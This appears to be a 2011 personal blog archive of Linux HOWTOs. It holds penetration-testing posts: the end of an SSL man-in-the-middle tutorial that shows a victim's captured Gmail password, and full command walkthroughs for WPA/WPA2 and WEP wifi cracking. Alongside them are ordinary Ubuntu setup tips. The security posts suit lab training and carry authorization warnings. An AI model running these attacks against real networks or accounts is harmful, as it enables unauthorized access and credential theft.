At the victim's machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail.

When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine. The display will be similar to the following :

HTTP : 74.125.71.106:443 -> USER: samiux  PASS: password  INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

You will find that USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate on Firefox at victim's machine : "Edit" -- "Perference" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.

Thawte Consulting (Pty) Ltd.

www.google.com www.google.com:443 forever 2011-09-21

www.google.com mail.google.com:443 forever 2011-09-21

In general, GMail will not ask you to accept any certificate, especially untrusted one.

That's all! See you.

HOWTO : Back|Track 5 on VirtualBox 4.0.8

2011-05-26T23:57:00.030+08:00

(A) Install Back|Track 5 on VirtualBox

Install VirtualBox 4.0.8 on the host computer, such as Ubuntu 11.04 as usual. Then install Back|Track 5 on the VirtualBox. Next is to install Oracle VM VirtualBox Extension Pack and Guest Additons.

Oracle VM VirtualBox Extension Pack is installed on the host computer, such as Ubuntu 11.04. You can find it on the Download page.

To install Guest Additons, just click "Devices" -- "Install Guest Additions" on the menu.

Do the following on the guest computer (Back|Track 5) :

cd /media/VBOXADDITONS_4.0.8_71778

./VBoxLinuxAddtions.run

To fix the boot up screen.

fix-splash

Do the following on the host computer (Ubuntu 11.04) :

Add you (username) to the group of vboxusers, e.g. samiux as username.

useradd -G vboxusers samiux

Go to "Users and Groups", "Advanced Settings" -- "User's Rights" select "Use VirtualBox solution".

Then, reboot your host to make it effective.

Remember not to enable USB 2.0 on the VirtualBox as some USB dongles do not work properly when it is enabled.

Finally, the following wireless USB dongles have been tested and they are all working perfectly out of the box. They are all support injection too.

TP-Link TL-WN321G 54Mbps Wireless G USB Adapter

TP-Link TL-WN821N 300Mbps Wireless N USB Adapter

TP-Link TL-WN822N 300Mbps High Gain Wireless N USB Adapter

*** This tutorial is also applied to VirtualBox 4.1.2.

Remarks :

When the kernel of Back|Track 5 is upgraded, the Guest Additions will be damaged. You need to do the following on Back|Track 5 and then reinstall the Guest Additions :

prepare-kernel-sources

cd /usr/src/linux

cp -rf include/generated/* include/linux/

(B) Create Metasploitable virtual machine (Optional)

Go to the following link to download the "Metasploitable" which is an Ubuntu 8.04 server with some flaws.

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Set the downloaded Metasploitable as virtual hard drive at VirtualBox. The network adapter is set to "Host-Only". The virtual hard disk space is at least 8GB and 512MB RAM for the Metasploitable.

(C) The VirtualBox intranet

Now, the IP address of eth0 of Metasploitable is similar to 192.168.56.101. The IP address of eth0 and eth1 of Back|Track are similar to 10.0.2.15 and 192.168.56.102 respectively.

You may require to execute the following command at Back|Track in order to see the two network interfaces and their IPs.

/etc/init.d/networking restart

Back|Track can access (or ping) Metasploitable via IP address. Back|Track can surf the internet but Metasploitable cannot.

At last, your penetration environment is set up.

(D) Free Tutorials

(1) Metaploit Unleashed
(2) Fast-Track
(3) Social-Engineer Tootkit
(4) Got Milk?
(5) How to Metasploit Beginner to Advanced (Video)
(6) SecurityTube.net (Video)
(7) BackTrack WiKi

(E) Non-free Training

Offensive Security

(F) Resources

(1) Exploits Database
(2) Metaploit Blog
(3) Offensive security Blog
(4) Yet another Back|Track in Gnome
(5) Metasploit
(6) Google Hacking-Database
(7) BackBox Linux

You may find the following links useful :

HOWTO : Bug fix for Back|Track 5

HOWTO : WEP cracking with Back|Track 5

HOWTO : WPA/WPA2 cracking with Back|Track 5

HOWTO : No skill hacking with Armitage on Back|Track 4 R2

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : The Onion Router (Tor) on Back|Track 5

HOWTO : FeedingBottle 3.2 on Back|Track 5

HOWTO : Update script for Back|Track 5

HOWTO : Yet Another Update script for Back|Track 5

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

HOWTO : Adobe Flash 10.3 on Back|Track 5

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

Does Snort really protect your network?

HOWTO : Solves the Wireshark not loading on Back|Track 5

HOWTO : Register to OSVDB and Nessus on Back|Track 5

HOWTO : Anonymous in chat.freenode.net with XChat

HOWTO : Pure-ftpd and atftpd on Back|Track 5

HOWTO : SSH Tunneling - Remote Port Forwarding

HOWTO : Penetration Testing in the Real World

g0tmi1k's Video Series

That's all! See you.

HOWTO : WPA/WPA2 cracking with Back|Track 5

2011-05-22T08:57:00.031+08:00

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]

Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz

cd pyrit-0.4.0

python setup.py build

sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0

python setup.py build

sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+



Parsing file 'new.cap' (1/1)...

Parsed 71 packets (71 802.11-packets), got 55 AP(s)



Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.

HOWTO : WEP cracking with Back|Track 5

2011-05-22T08:52:00.006+08:00

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 :

airodump-ng mon0

Press "Ctrl+c" to break the program.

Step 4 :

airodump-ng -c 6 -w wepcrack --bssid 99:88:77:66:55:44 mon0

*where -c is the channel
            -w is the file to be written
            --bssid is the BSSID

Step 5 :

open another terminal.

aireplay-ng -1 0 -a 99:88:77:66:55:44 mon0

*where -a is BSSID

The terminal is keeping running.

Step 6 :

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 99:88:77:66:55:44 mon0

*where -c is client's MAC address (STATION)
            -b is BSSID

When asking "Use this packet?", answer "y".

Step 7 :

open another terminal.

aircrack-ng wepcrack*.cap

That's all! See you.

HOWTO : Bug fix for Back|Track 5

2011-05-21T07:51:00.005+08:00

BackTrack 5 is a Penetration Testing Distribution and it is released on May 10, 2011 and it comes with Gnome and KDE as well as 32-bit, 64-bit and ARM versions.

The following solutions are summarized from BackTrack 5 forum as at May 21, 2011 (GMT +8).

Bug #1 : Quick fix for scan modules not working in Armitage

cd /pentest/exploits/framework3/external/pcaprub/

ruby extconf.rb 

make

make install

Bug #2 : Gnome - waiting for audio system to respond

mkdir ~/.config/autostart

nano ~/.config/autostart/pulseaudio.desktop

[Desktop Entry]

Type=Application

Exec=/usr/bin/pulseaudio

Hidden=false

NoDisplay=false

X-GNOME-Autostart-enabled=true

Name=Pulseaudio

Comment=Start Pulseaudio

Bug #3 : Where is Fast-track on 64-bit system?

svn co http://svn.secmaniac.com/fasttrack fasttrack/

cd fasttrack

python setup.py install

mv ~/fasttrack/ /pentest/exploits/

Answer "yes" when asked during the captioned commands.

Bug #4 : Fix error when building nvidia-current

nano /usr/src/nvidia-current-195.36.24/nv.c

Change from :
.ioctl = nv_kern_ioctl,

To :
.unlocked_ioctl = nv_kern_unlocked_ioctl,

apt-get update

apt-get upgrade

apt-get install nvidia-current

If fail, try the below :

dkms build -m nvidia-current -v 195.36.24

dkms install -m nvidia-current -v 195.36.24

modprobe nvidia-current

Bug #5 : White screen of death (ATi display card)

nano /etc/default/grub

Change from :
GRUB_CMDLINE_LINUX_DEFAULT="text splash"

To :
GRUB_CMDLINE_LINUX_DEFAULT="text splash radeon.modeset=0"

Bug #6 : airdrop-ng and pylorcon

apt-get install python-dev

Bug #7 : xgps on 64-bit system

Go to the following link :
http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/index.php#SWT

Download "Linux (x86_64/GTK 2)", version is 3.5.2 at the time of this writing :

http://archive.eclipse.org/eclipse/downloads/drops/R-3.5.2-201002111343/download.php?dropFile=swt-3.5.2-gtk-linux-x86_64.zip

unzip swt-3.5.2-gtk-linux-x86_64.zip

cp swt.jar /usr/share/xgpsmanager

Bug #8 : Gnome - Ettercap-gtk crashes while scanning for hosts

Please refer to the following link :
http://www.backtrack-linux.org/forums/backtrack-5-bugs/40556-ettercap-gtk-crashes-while-scanning-hosts.html

Bug #9 : SET configuration bug

cd /pentest/exploits/set/config

nano set_config

Change from :
DNSSPOOF_PATH=/usr/sbin/dnsspoof

To :
DNSSPOOF_PATH=/usr/sbin/local/dnsspoof

and

Change from :
AIRBASE_NG_PATH=/pentest/wireless/aircrack-ng/src/airbase-ng

To :
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng

Bug #10 : Teensy/SET

Please refer to the following link :
http://www.backtrack-linux.org/forums/backtrack-5-fixes/40484-bt5-kde-64bit-teensy-s-e-t.html

Remarks :

BackTrack 5 site

BackTrack 5 Download

BackTrack 5 wiki

BackTrack Forum

That's all! See you.

HOWTO : Octoshape on Ubuntu 11.04 Desktop

2011-05-18T21:15:00.002+08:00

When listen to the online radio of RTHK at http://www.rthk.org.hk, you may find a "HQ" button. This button activates a third party plugin namely Octoshape which can deliver high quality video and audio streaming. Now, you can enjoy this high quality radio streaming on Ubuntu 11.04.

Step 1 :

Install the plugin. No matter you have 32-bit or 64-bit system, you can follow the commands below to install. The plugin will be installed at your home directory.

wget http://www.octoshape.com/files/octosetup-linux_i386.bin

chmod +x octosetup-linux_i386.bin

./octosetup-linux_i386.bin

Step 2 :

Make sure the client is running in the terminal (the commands below) when playback the HQ video and / or audio.

cd octoshape

./OctoshapeClient

Step 3 :

Open Firefox and go to RTHK and select one of the online programme by clicking "HQ" button. Make sure the Octoshape Client is running as per Step 2.

Now, you can enjoy the HQ video and / or audio on the website.

That's all! See you.

HOWTO : Unity Interface's Shortcut Keys and Mouse Tricks

2011-05-16T14:29:00.003+08:00

Super Key(Windows Key) - Opens dash.

Hold Super Key - Invokes Launcher.

Hold Super Key and hit 1, 2, 3 etc - Open an Application from Launcher. When you hold the Super Key, specific numbers will be displayed in order above each application.

Alt + F1 - Put keyboard focus on the Launcher, use arrow keys to navigate, Enter launches the application, Right arrow exposes the quicklists if an application has them.

Alt + F2 - Opens dash in special mode to run any commands.

Super + A - Opens up application window from launcher.

Super + F - Opens up files and folders window from launcher. Both these shortcuts can be viewed by simply holding the Super Key as well.

Super + W - Spread mode, zoom out on all windows in all workspaces.

Super + D - Minimize all windows(acts as Show Desktop). Hitting it again restores them.

Super + T - Opens trash can.

Super + S - Expo mode (for everything), zooms out on all the workspaces and let's you manage windows.

Ctrl + Alt + T - Launch Terminal.

Ctrl + Alt + L - Lock Screen.

Ctrl + Alt + Left/Right/Up/Down - Move to new workspace.

Ctrl + Alt + Shift + Left/Right/Up/Down - Place window to a new workspace.

F10 - Open the first menu on top panel, use arrows keys to browse across the menus.

Mouse Shortcuts/Tricks for Ubuntu Unity

* Clicking and holding an icon and then dragging it around will allow you to reorder it on the launcher. You can also drag it off to the right of the launcher to move it around. Note that you need to make an explicit movement to the right to move the icon off the launcher before you can move it around.

* Dragging and Dropping an icon into the trash can will remove it from the Launcher.

* Moving and holding the cursor on the left side for a few seconds will launch Unity dock.

* Moving the cursor to top-left corner(near Ubuntu icon) will launch Unity dock as well.

* Scrolling the mouse wheel while over the Launcher scrolls the icons if you have too many and need to move around quickly.

* By Scrolling the mouse wheel while over the Sound icon on top panel helps you increase or decrease system volume.

* Middle click on an application's launcher icon - Open a new instance of the application in a new window. Very useful at times. In laptops with touchpads, hitting left/right click buttons together is akin to middle click.

* Maximizing - Dragging a window to the top panel will maximize it.

* Restore/Unmaximize - Dragging the top panel down OR double clicking on the top panel will do.

* Tiling - Dragging a Window to the left/right border will auto tile it to that side of the screen. One of the highlights of new Unity experience.

And Some Useful Window Management Shortcuts
Alt + F10 - Toggle between Maximize/Unmaximize current window.

Alt + F9 - Minimize current window.

Alt + Tab - Toggle between currently open windows.

Alt + F4 - Closes current window.

Alt + F7 - Moves the current window(both keyboard and mouse can be used

By the way, you can download the captioned shortcut key wallpaper at here.

That's all! See you.

HOWTO : Blank screen when boot up Ubuntu 11.04 Desktop

2011-05-16T11:33:00.002+08:00

I have a very old SONY laptop and the model is PCG-TR1. The following is the display card of the laptop :

lspci | grep VGA

00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02)

You can boot up the Live CD or DVD and install the system properly. It is no problem when the first boot up after the installation. However, it will be blank screen / black screen on the second and later boot up.

How to overcome this problem? Yes, I can and going to tell you.

Step 1 :

The screen will go blank and black in the second boot and later. Don't worry, just press the following key combination. Yes, just complete the following key combination.

Press ctrl+alt+F5, ctrl+alt+F7, ctrl+alt+F5, and then ctrl+alt+F7

Then, you will see the login screen again. You should press the key combination every time when you boot up your system.

However, the Unity 3D interface and special effect do not support but classic is working fine.

Step 2 (Optional) :

To use Unity 2D interface instead of Gnome classic interface.

sudo apt-get update

sudo apt-get install unity-2d

Reboot your system.

Select "Unity 2D" at the bottom of the screen when login to the system after the next boot up.

Remarks :

Some laptops that equipped with other model of Intel integrated display cards may encounter other problems, such as blinking screen. Someone out there suggest to update the xorg packages may solve the problems.

sudo add-apt-repository ppa:xorg-edgers/ppa

sudo apt-get update

sudo apt-get dist-upgrade

That's all! See you.

HOWTO : SopCast and PPStream on Ubuntu 11.04 Desktop Made Easy

2011-05-14T05:23:00.016+08:00

SopCast is online TV and PPStream is online movie of China. Now, you can watch these online TV and movies on Totem. This tutorial is written for any person who know Chinese.

Step 1 :

sudo apt-add-repository ppa:cnav/ppa

sudo apt-get update

Step 2 :

SopCast :

sudo apt-get install sopcast gst-plugins-sopcast totem-sopcast

PPStream :

sudo apt-get install ppstream gst-plugins-pps totem-plugin-pps totem-pps

Step 3 :

Open Totem. Select "Edit" -- "Plugins" on the menu.

Enable "SopCast browser" and "PPStream browser".

Enable "Show channel name in Chinese" at "Setup" of "SopCast". This step is important if you want to use "Step 6" below; otherwise, some channels cannot be shown up.

Select "SopCast" or "PPStream" at the right hand side's sidebar and enjoy it.

Step 4 (Optional) :

Enter "about:config" (without quote) at the address field of Firefox. Right click on any empty place. Select "Add", then choose "Boolean". Enter "network.protocol-handler.expose.pps" (without quote) to the place provided. Then choose "false".

Go to http://kan.pps.tv/ and choose any movie and select "Client Playback" (客戶端播放). Then select "/usr/bin/totem" from the file system.

The video will be playback on the Totem after clicking on the "Client Playback".

Step 5 (Optional) :

Install GMLive for SopCast channels as the channel of SopCast at Totem does not work.

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install gmlive

(a) Open GMLive and select "Tools" on the menu. "Preference" -- "SopCast"

Change the values as the following :

Mplayer cache : 8192 Kbs

Boardcast URL : http://www.sopcast.com/gchlxml

(b) Open GMLive and select "Tools" on the menu. "Preference" -- "GMLive"

Disable "PPLive support".
PPStream function does not work at GMLive.

Football channels for example :
"Vozao.com" and "Sports Channel" on the list of SopCast.

Step 6 (Optional) :

(a) If you want to use the channel list of GMLive instead of Totem's one, you can copy it.

mv ~/.local/share/totem/plugin/sopcast/channels.xml ~/.local/share/totem/plugin/sopcast/channels.xml-original

cp ~/.config/gmlive/sopcast.lst ~/.local/share/totem/plugin/sopcast/channels.xml

(b) Or, if you do not want to install GMLive, you can download the channel list for SopCast official site.

mv ~/.local/share/totem/plugin/sopcast/channels.xml ~/.local/share/totem/plugin/sopcast/channels.xml-original

wget http://www.sopcast.com/gchlxml

cp gchlxml ~/.local/share/totem/plugin/sopcast/channels.xml

The same football channels as "Step 5" are at the "Other" on the right hand side of the Totem. They are "Sport" and "Soccerhd.info".

Remarks :

Some channels of SopCast on Totem are not working. However, sports channel of CCTV is working properly. Fortunately, it can be overcame by doing the "Step 6(a)" or "Step 6(b)".

The video playback with PPStream on Totem will not be counted at the webpage of http://kan.pps.tv/. Therefore, some of the movies cannot be watched.

PPStream does not work on GMLive. PPLive does not support on GMLive in this tutorial.

** If you are using Ubuntu Samiux Remix 11.04 r0.8.1 or later, the captioned steps had been completed for you (but except the Firefox step). You can use it right away. You can download it at here.

UPDATED

Today (2011-June-11), I cannot use Totem to watch PPStream and the reason is still unknown. However, PPStream can be (Search for the application namely PPStream by press "Super" key). Just go to "Tool" -- "Option" -- "Select Sound device" and choose "alsa" to enable the sound of the PPStream.

That's all! See you.

HOWTO : HD video playback on Ubuntu 11.04 Desktop

2011-05-07T10:12:00.007+08:00

Step 1 - Install the official driver and SMPlayer from Ubuntu :

Install the official nVidia or ATi display card driver from the "Hardware drivers" from your Ubuntu 11.04 system. Then, install SMPlayer for the video player.

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install smplayer

Step 2 - SMPlayer configuration :

(A) Open the SMplayer. Select "Option" -- "Preference".

Go to "General" on the left hand side :

(1) If you have an nVidia display card :
"General" -- "Video" -- "Output driver" : vdpau

(2) If you have an ATi/AMD Radeon display card :
"General" -- "Video" -- "Output driver" : xv (0 - ATI Radeon AVIVO video)

(B) Go to "Performance" on the left hand side :
"Performance" -- "Cache" -- "Local" : 99999 kb
"Performance" -- "Cache" -- "Streaming" : 99999 kb

"Performance" -- "Performance" -- "Allow hard frame drop (can lead to image distortion)" : Enable
"Performance" -- "Performance" -- "H.264" -- select "loop filter (only skip on HD moive)"

If you have dual core CPU -
"Performance" -- "Performance" -- "Decoding thread (only MEG-1/2 and H.264)" : 2

Remarks :

Lenovo ThinkPad X100e, which is equipped with ATi Radeon HD3200 and AMD Athlon Neo MV-40 single processor, can playback HD movies (such as MKV) smoothly.

That's all! See you.

HOWTO : nVidia CUDA 4.0 RC on Ubuntu 11.04 Server

2011-05-03T16:49:00.000+08:00

If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 11.04 Server.

You will experience a faster server after the installation of CUDA 4.0.

This HOWTO does not require to install X.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Step 2 :

sudo apt-get update

sudo apt-get upgrade

64-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Step 3 :

sudo nano /etc/init.d/nvidia_cuda

Append the following lines.

============= Copy from here ================

#!/bin/bash



PATH=/sbin:/bin:/usr/bin:$PATH



/sbin/modprobe nvidia



if [ "$?" -eq 0 ]; then



   # Count the number of NVIDIA controllers found.

   N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`

   NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`



   N=`expr $N3D + $NVGA - 1`

   for i in `seq 0 $N`; do

      /bin/mknod -m 666 /dev/nvidia$i c 195 $i;

   done



   /bin/mknod -m 666 /dev/nvidiactl c 195 255



else

   exit 1

fi

HOWTO : nVidia CUDA 4.0 RC on Ubuntu 11.04 Desktop

2011-05-03T16:47:00.004+08:00

If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 11.04 Desktop.

You will experience a faster desktop after the installation of CUDA 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Step 2 :

sudo apt-get update

sudo apt-get upgrade

64-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers

32-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers

Hints on installation of Ubuntu 11.04

2011-05-02T22:03:00.004+08:00

Ubuntu 11.04 comes with a new theme namely Unity. It is a 3D theme that requires 3D display driver.

If you have an nVidia or ATi/AMD display cards, you should install the display driver after the installation of Ubuntu 11.04. Otherwise, you will be in Classic interface instead of Unity.

Or, may be you can install the 2D Unity instead.

sudo apt-get install unity-2d

Furthermore, the 3D Unity will be installed automatically on Intel display card system.

In addition, if you are going to install Ubuntu 11.04 on a laptop or netbook, you should plug in the power cable; otherwise, your interface after the installation will be in a mess.

If you considered to upgrade from 10.10, I recommended to fresh install as some previous settings of Gnome may affect to the new interface - Unity as well as Firefox 4. Before fresh install, please backup all your data.

By the way, if you encounter the blank screen or black screen on Intel display card system, you can refer to this tutorial.

The following is the video which shows you how to operate with the Unity on my remastered Ubuntu Samiux Remix :

That's all! See you.

HOWTO : Moonlight on Ubuntu 11.04

2011-05-02T17:31:00.002+08:00

Moonlight is a clone of Microsoft Silverlight for Linux. Ubuntu 11.04 has it in the repository.

Step 1 :

sudo apt-get update

sudo apt-get upgrade

sudo apt-get install libmoon moonlight-plugin-mozilla moonlight-plugin-core

Step 2 :

Go to the official Mono site to download and install the addon for Firefox.

Mono site

Step 3 (Optional) :

Go to Hong Kong Jockey Club website to test the result of the installation. You may required to install Microsoft Video Media Codec. Just do so to install.

After that, restart your Firefox to make the addon works.

Remarks :

When the Firefox is updated to 5.0, the Moonlight is not supported. However, you can download "Add-on Compatibility Reporter" to overcome this problem.

Add-on Compatibility Reporter

That's all! See you.

HOWTO : Ubuntu 11.04 on Gigabyte TouchNote T1028X/M1028

2011-04-30T20:23:00.001+08:00

Gigabyte TouchNote T1028X/M1028 equipped with Intel Atom N280 and eGalax touch screen. It runs Ubuntu 11.04 flawlessly except touchpad. This tutorial is telling you how to overcome this problem.

"lsusb" shows the following :

Bus 005 Device 002: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen

Step 1 :

Boot up the system and press "Ctrl+Alt+t" to open a terminal.

sudo nano /etc/default/grub

Append "i8042.noloop=1" to "GRUB_CMDLINE_LINUX_DEFAULT".

It will look like this :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i8042.noloop=1"

Save and exit.

sudo update-grub

Step 2 :

sudo nano /etc/modprobe.d/blacklist.conf

Append the following to the file.

blacklist usbtouchscreen

Step 3 :

Reboot your system.

That's all! See you.

HOWTO : Wipe hard drive safety and completely

2011-04-27T03:59:00.001+08:00

Darik's Boot and Nuke (DBAN) is a self-contained boot disk that securely wipes the hard disks of most computers. DBAN will automatically and completely delete the contents of any hard disk that it can detect, which makes it an appropriate utility for bulk or emergency data destruction.

There are some wipe methods, they are Quick Erase, RCMP TSSIT OPS-II, DoD Short, DoD 520.22-M, Gutmann Wipe and PRNG Stream. Where DoD is The American Department of Defense. The default is The American Department of Defense 5220.22-M short wipe (DoD Short).

It is a very easy to use utility. A 300GB hard drive will take about 2 or 3 hours to wipe with the DoD Short method. The hard drive after the wipe is like a brand new one.

You can download it at here. Then, burn it in a CD-ROM or create a bootable USB stick with UNetBootin.

That's all! See you.

HOWTO : nVidia CUDA 4.0 RC on Ubuntu 10.10 Server

2011-04-24T14:34:00.007+08:00

If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 10.10 Server.

You will experience a faster server after the installation of CUDA 4.0.

This HOWTO does not require to install X.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Step 2 :

sudo apt-get update

sudo apt-get upgrade

64-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc nvidia-current-modaliases libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers

32-bit :

sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc nvidia-current-modaliases lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers

Step 3 :

sudo nano /etc/init.d/nvidia_cuda

Append the following lines.

============= Copy from here ================

#!/bin/bash



PATH=/sbin:/bin:/usr/bin:$PATH



/sbin/modprobe nvidia



if [ "$?" -eq 0 ]; then



   # Count the number of NVIDIA controllers found.

   N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`

   NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`



   N=`expr $N3D + $NVGA - 1`

   for i in `seq 0 $N`; do

      /bin/mknod -m 666 /dev/nvidia$i c 195 $i;

   done



   /bin/mknod -m 666 /dev/nvidiactl c 195 255



else

   exit 1

fi

HOWTO : nVidia CUDA 4.0 RC on Ubuntu 10.10 Desktop

2011-04-23T20:22:00.025+08:00

If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 10.10 Desktop.

You will experience a faster desktop after the installation of CUDA 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.

Step 1 :

Add the CUDA 4.0 PPA.
sudo add-apt-repository ppa:aaron-haviland/cuda-4.0

Step 2 :

